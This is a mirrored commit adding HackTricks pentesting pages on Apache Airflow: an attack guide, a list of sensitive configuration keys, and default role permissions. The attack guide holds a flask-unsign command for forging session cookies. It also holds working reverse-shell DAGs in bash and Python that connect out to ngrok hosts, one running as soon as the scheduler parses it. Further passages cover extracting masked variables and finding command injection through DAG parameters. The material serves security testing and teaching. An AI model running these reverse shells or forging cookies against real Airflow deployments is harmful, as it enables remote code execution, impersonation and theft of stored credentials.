mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2025-12-31 07:00:38 -08:00
Migrate to using mdbook
This commit is contained in:
175
src/pentesting-ci-cd/apache-airflow-security/README.md
Normal file
175
src/pentesting-ci-cd/apache-airflow-security/README.md
Normal file
@@ -0,0 +1,175 @@
|
||||
# Apache Airflow Security
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
### Basic Information
|
||||
|
||||
[**Apache Airflow**](https://airflow.apache.org) serves as a platform for **orchestrating and scheduling data pipelines or workflows**. The term "orchestration" in the context of data pipelines signifies the process of arranging, coordinating, and managing complex data workflows originating from various sources. The primary purpose of these orchestrated data pipelines is to furnish processed and consumable data sets. These data sets are extensively utilized by a myriad of applications, including but not limited to business intelligence tools, data science and machine learning models, all of which are foundational to the functioning of big data applications.
|
||||
|
||||
Basically, Apache Airflow will allow you to **schedule the execution of code when something** (event, cron) **happens**.
|
||||
|
||||
### Local Lab
|
||||
|
||||
#### Docker-Compose
|
||||
|
||||
You can use the **docker-compose config file from** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) to launch a complete apache airflow docker environment. (If you are in MacOS make sure to give at least 6GB of RAM to the docker VM).
|
||||
|
||||
#### Minikube
|
||||
|
||||
One easy way to **run apache airflo**w is to run it **with minikube**:
|
||||
|
||||
```bash
|
||||
helm repo add airflow-stable https://airflow-helm.github.io/charts
|
||||
helm repo update
|
||||
helm install airflow-release airflow-stable/airflow
|
||||
# Some information about how to aceess the web console will appear after this command
|
||||
|
||||
# Use this command to delete it
|
||||
helm delete airflow-release
|
||||
```
|
||||
|
||||
### Airflow Configuration
|
||||
|
||||
Airflow might store **sensitive information** in its configuration or you can find weak configurations in place:
|
||||
|
||||
{{#ref}}
|
||||
airflow-configuration.md
|
||||
{{#endref}}
|
||||
|
||||
### Airflow RBAC
|
||||
|
||||
Before start attacking Airflow you should understand **how permissions work**:
|
||||
|
||||
{{#ref}}
|
||||
airflow-rbac.md
|
||||
{{#endref}}
|
||||
|
||||
### Attacks
|
||||
|
||||
#### Web Console Enumeration
|
||||
|
||||
If you have **access to the web console** you might be able to access some or all of the following information:
|
||||
|
||||
- **Variables** (Custom sensitive information might be stored here)
|
||||
- **Connections** (Custom sensitive information might be stored here)
|
||||
- Access them in `http://<airflow>/connection/list/`
|
||||
- [**Configuration**](./#airflow-configuration) (Sensitive information like the **`secret_key`** and passwords might be stored here)
|
||||
- List **users & roles**
|
||||
- **Code of each DAG** (which might contain interesting info)
|
||||
|
||||
#### Retrieve Variables Values
|
||||
|
||||
Variables can be stored in Airflow so the **DAGs** can **access** their values. It's similar to secrets of other platforms. If you have **enough permissions** you can access them in the GUI in `http://<airflow>/variable/list/`.\
|
||||
Airflow by default will show the value of the variable in the GUI, however, according to [**this**](https://marclamberti.com/blog/variables-with-apache-airflow/) it's possible to set a **list of variables** whose **value** will appear as **asterisks** in the **GUI**.
|
||||
|
||||
.png>)
|
||||
|
||||
However, these **values** can still be **retrieved** via **CLI** (you need to have DB access), **arbitrary DAG** execution, **API** accessing the variables endpoint (the API needs to be activated), and **even the GUI itself!**\
|
||||
To access those values from the GUI just **select the variables** you want to access and **click on Actions -> Export**.\
|
||||
Another way is to perform a **bruteforce** to the **hidden value** using the **search filtering** it until you get it:
|
||||
|
||||
.png>)
|
||||
|
||||
#### Privilege Escalation
|
||||
|
||||
If the **`expose_config`** configuration is set to **True**, from the **role User** and **upwards** can **read** the **config in the web**. In this config, the **`secret_key`** appears, which means any user with this valid they can **create its own signed cookie to impersonate any other user account**.
|
||||
|
||||
```bash
|
||||
flask-unsign --sign --secret '<secret_key>' --cookie "{'_fresh': True, '_id': '12345581593cf26619776d0a1e430c412171f4d12a58d30bef3b2dd379fc8b3715f2bd526eb00497fcad5e270370d269289b65720f5b30a39e5598dad6412345', '_permanent': True, 'csrf_token': '09dd9e7212e6874b104aad957bbf8072616b8fbc', 'dag_status_filter': 'all', 'locale': 'en', 'user_id': '1'}"
|
||||
```
|
||||
|
||||
#### DAG Backdoor (RCE in Airflow worker)
|
||||
|
||||
If you have **write access** to the place where the **DAGs are saved**, you can just **create one** that will send you a **reverse shell.**\
|
||||
Note that this reverse shell is going to be executed inside an **airflow worker container**:
|
||||
|
||||
```python
|
||||
import pendulum
|
||||
from airflow import DAG
|
||||
from airflow.operators.bash import BashOperator
|
||||
|
||||
with DAG(
|
||||
dag_id='rev_shell_bash',
|
||||
schedule_interval='0 0 * * *',
|
||||
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
|
||||
) as dag:
|
||||
run = BashOperator(
|
||||
task_id='run',
|
||||
bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1',
|
||||
)
|
||||
```
|
||||
|
||||
```python
|
||||
import pendulum, socket, os, pty
|
||||
from airflow import DAG
|
||||
from airflow.operators.python import PythonOperator
|
||||
|
||||
def rs(rhost, port):
|
||||
s = socket.socket()
|
||||
s.connect((rhost, port))
|
||||
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
|
||||
pty.spawn("/bin/sh")
|
||||
|
||||
with DAG(
|
||||
dag_id='rev_shell_python',
|
||||
schedule_interval='0 0 * * *',
|
||||
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
|
||||
) as dag:
|
||||
run = PythonOperator(
|
||||
task_id='rs_python',
|
||||
python_callable=rs,
|
||||
op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433}
|
||||
)
|
||||
```
|
||||
|
||||
#### DAG Backdoor (RCE in Airflow scheduler)
|
||||
|
||||
If you set something to be **executed in the root of the code**, at the moment of this writing, it will be **executed by the scheduler** after a couple of seconds after placing it inside the DAG's folder.
|
||||
|
||||
```python
|
||||
import pendulum, socket, os, pty
|
||||
from airflow import DAG
|
||||
from airflow.operators.python import PythonOperator
|
||||
|
||||
def rs(rhost, port):
|
||||
s = socket.socket()
|
||||
s.connect((rhost, port))
|
||||
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
|
||||
pty.spawn("/bin/sh")
|
||||
|
||||
rs("2.tcp.ngrok.io", 14403)
|
||||
|
||||
with DAG(
|
||||
dag_id='rev_shell_python2',
|
||||
schedule_interval='0 0 * * *',
|
||||
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
|
||||
) as dag:
|
||||
run = PythonOperator(
|
||||
task_id='rs_python2',
|
||||
python_callable=rs,
|
||||
op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144}
|
||||
```
|
||||
|
||||
#### DAG Creation
|
||||
|
||||
If you manage to **compromise a machine inside the DAG cluster**, you can create new **DAGs scripts** in the `dags/` folder and they will be **replicated in the rest of the machines** inside the DAG cluster.
|
||||
|
||||
#### DAG Code Injection
|
||||
|
||||
When you execute a DAG from the GUI you can **pass arguments** to it.\
|
||||
Therefore, if the DAG is not properly coded it could be **vulnerable to Command Injection.**\
|
||||
That is what happened in this CVE: [https://www.exploit-db.com/exploits/49927](https://www.exploit-db.com/exploits/49927)
|
||||
|
||||
All you need to know to **start looking for command injections in DAGs** is that **parameters** are **accessed** with the code **`dag_run.conf.get("param_name")`**.
|
||||
|
||||
Moreover, the same vulnerability might occur with **variables** (note that with enough privileges you could **control the value of the variables** in the GUI). Variables are **accessed with**:
|
||||
|
||||
```python
|
||||
from airflow.models import Variable
|
||||
[...]
|
||||
foo = Variable.get("foo")
|
||||
```
|
||||
|
||||
If they are used for example inside a a bash command, you could perform a command injection.
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
@@ -0,0 +1,111 @@
|
||||
# Airflow Configuration
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
## Configuration File
|
||||
|
||||
**Apache Airflow** generates a **config file** in all the airflow machines called **`airflow.cfg`** in the home of the airflow user. This config file contains configuration information and **might contain interesting and sensitive information.**
|
||||
|
||||
**There are two ways to access this file: By compromising some airflow machine, or accessing the web console.**
|
||||
|
||||
Note that the **values inside the config file** **might not be the ones used**, as you can overwrite them setting env variables such as `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'`.
|
||||
|
||||
If you have access to the **config file in the web server**, you can check the **real running configuration** in the same page the config is displayed.\
|
||||
If you have **access to some machine inside the airflow env**, check the **environment**.
|
||||
|
||||
Some interesting values to check when reading the config file:
|
||||
|
||||
### \[api]
|
||||
|
||||
- **`access_control_allow_headers`**: This indicates the **allowed** **headers** for **CORS**
|
||||
- **`access_control_allow_methods`**: This indicates the **allowed methods** for **CORS**
|
||||
- **`access_control_allow_origins`**: This indicates the **allowed origins** for **CORS**
|
||||
- **`auth_backend`**: [**According to the docs**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) a few options can be in place to configure who can access to the API:
|
||||
- `airflow.api.auth.backend.deny_all`: **By default nobody** can access the API
|
||||
- `airflow.api.auth.backend.default`: **Everyone can** access it without authentication
|
||||
- `airflow.api.auth.backend.kerberos_auth`: To configure **kerberos authentication**
|
||||
- `airflow.api.auth.backend.basic_auth`: For **basic authentication**
|
||||
- `airflow.composer.api.backend.composer_auth`: Uses composers authentication (GCP) (from [**here**](https://cloud.google.com/composer/docs/access-airflow-api)).
|
||||
- `composer_auth_user_registration_role`: This indicates the **role** the **composer user** will get inside **airflow** (**Op** by default).
|
||||
- You can also **create you own authentication** method with python.
|
||||
- **`google_key_path`:** Path to the **GCP service account key**
|
||||
|
||||
### **\[atlas]**
|
||||
|
||||
- **`password`**: Atlas password
|
||||
- **`username`**: Atlas username
|
||||
|
||||
### \[celery]
|
||||
|
||||
- **`flower_basic_auth`** : Credentials (_user1:password1,user2:password2_)
|
||||
- **`result_backend`**: Postgres url which may contain **credentials**.
|
||||
- **`ssl_cacert`**: Path to the cacert
|
||||
- **`ssl_cert`**: Path to the cert
|
||||
- **`ssl_key`**: Path to the key
|
||||
|
||||
### \[core]
|
||||
|
||||
- **`dag_discovery_safe_mode`**: Enabled by default. When discovering DAGs, ignore any files that don’t contain the strings `DAG` and `airflow`.
|
||||
- **`fernet_key`**: Key to store encrypted variables (symmetric)
|
||||
- **`hide_sensitive_var_conn_fields`**: Enabled by default, hide sensitive info of connections.
|
||||
- **`security`**: What security module to use (for example kerberos)
|
||||
|
||||
### \[dask]
|
||||
|
||||
- **`tls_ca`**: Path to ca
|
||||
- **`tls_cert`**: Part to the cert
|
||||
- **`tls_key`**: Part to the tls key
|
||||
|
||||
### \[kerberos]
|
||||
|
||||
- **`ccache`**: Path to ccache file
|
||||
- **`forwardable`**: Enabled by default
|
||||
|
||||
### \[logging]
|
||||
|
||||
- **`google_key_path`**: Path to GCP JSON creds.
|
||||
|
||||
### \[secrets]
|
||||
|
||||
- **`backend`**: Full class name of secrets backend to enable
|
||||
- **`backend_kwargs`**: The backend_kwargs param is loaded into a dictionary and passed to **init** of secrets backend class.
|
||||
|
||||
### \[smtp]
|
||||
|
||||
- **`smtp_password`**: SMTP password
|
||||
- **`smtp_user`**: SMTP user
|
||||
|
||||
### \[webserver]
|
||||
|
||||
- **`cookie_samesite`**: By default it's **Lax**, so it's already the weakest possible value
|
||||
- **`cookie_secure`**: Set **secure flag** on the the session cookie
|
||||
- **`expose_config`**: By default is False, if true, the **config** can be **read** from the web **console**
|
||||
- **`expose_stacktrace`**: By default it's True, it will show **python tracebacks** (potentially useful for an attacker)
|
||||
- **`secret_key`**: This is the **key used by flask to sign the cookies** (if you have this you can **impersonate any user in Airflow**)
|
||||
- **`web_server_ssl_cert`**: **Path** to the **SSL** **cert**
|
||||
- **`web_server_ssl_key`**: **Path** to the **SSL** **Key**
|
||||
- **`x_frame_enabled`**: Default is **True**, so by default clickjacking isn't possible
|
||||
|
||||
### Web Authentication
|
||||
|
||||
By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as
|
||||
|
||||
```bash
|
||||
AUTH_TYPE = AUTH_DB
|
||||
```
|
||||
|
||||
Which means that the **authentication is checked against the database**. However, other configurations are possible like
|
||||
|
||||
```bash
|
||||
AUTH_TYPE = AUTH_OAUTH
|
||||
```
|
||||
|
||||
To leave the **authentication to third party services**.
|
||||
|
||||
However, there is also an option to a**llow anonymous users access**, setting the following parameter to the **desired role**:
|
||||
|
||||
```bash
|
||||
AUTH_ROLE_PUBLIC = 'Admin'
|
||||
```
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
43
src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md
Normal file
43
src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md
Normal file
@@ -0,0 +1,43 @@
|
||||
# Airflow RBAC
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
## RBAC
|
||||
|
||||
(From the docs)\[https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html]: Airflow ships with a **set of roles by default**: **Admin**, **User**, **Op**, **Viewer**, and **Public**. **Only `Admin`** users could **configure/alter the permissions for other roles**. But it is not recommended that `Admin` users alter these default roles in any way by removing or adding permissions to these roles.
|
||||
|
||||
- **`Admin`** users have all possible permissions.
|
||||
- **`Public`** users (anonymous) don’t have any permissions.
|
||||
- **`Viewer`** users have limited viewer permissions (only read). It **cannot see the config.**
|
||||
- **`User`** users have `Viewer` permissions plus additional user permissions that allows him to manage DAGs a bit. He **can see the config file**
|
||||
- **`Op`** users have `User` permissions plus additional op permissions.
|
||||
|
||||
Note that **admin** users can **create more roles** with more **granular permissions**.
|
||||
|
||||
Also note that the only default role with **permission to list users and roles is Admin, not even Op** is going to be able to do that.
|
||||
|
||||
### Default Permissions
|
||||
|
||||
These are the default permissions per default role:
|
||||
|
||||
- **Admin**
|
||||
|
||||
\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on Roles, can read on Permissions, can delete on Roles, can edit on Roles, can create on Roles, can read on Users, can create on Users, can edit on Users, can delete on Users, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs, can read on Task Reschedules, menu access on Task Reschedules, can read on Triggers, menu access on Triggers, can read on Passwords, can edit on Passwords, menu access on List Users, menu access on Security, menu access on List Roles, can read on User Stats Chart, menu access on User's Statistics, menu access on Base Permissions, can read on View Menus, menu access on Views/Menus, can read on Permission Views, menu access on Permission on Views/Menus, can get on MenuApi, menu access on Providers, can create on XComs]
|
||||
|
||||
- **Op**
|
||||
|
||||
\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs]
|
||||
|
||||
- **User**
|
||||
|
||||
\[can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances]
|
||||
|
||||
- **Viewer**
|
||||
|
||||
\[can read on DAGs, can read on DAG Runs, can read on Task Instances, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances]
|
||||
|
||||
- **Public**
|
||||
|
||||
\[]
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
Reference in New Issue
Block a user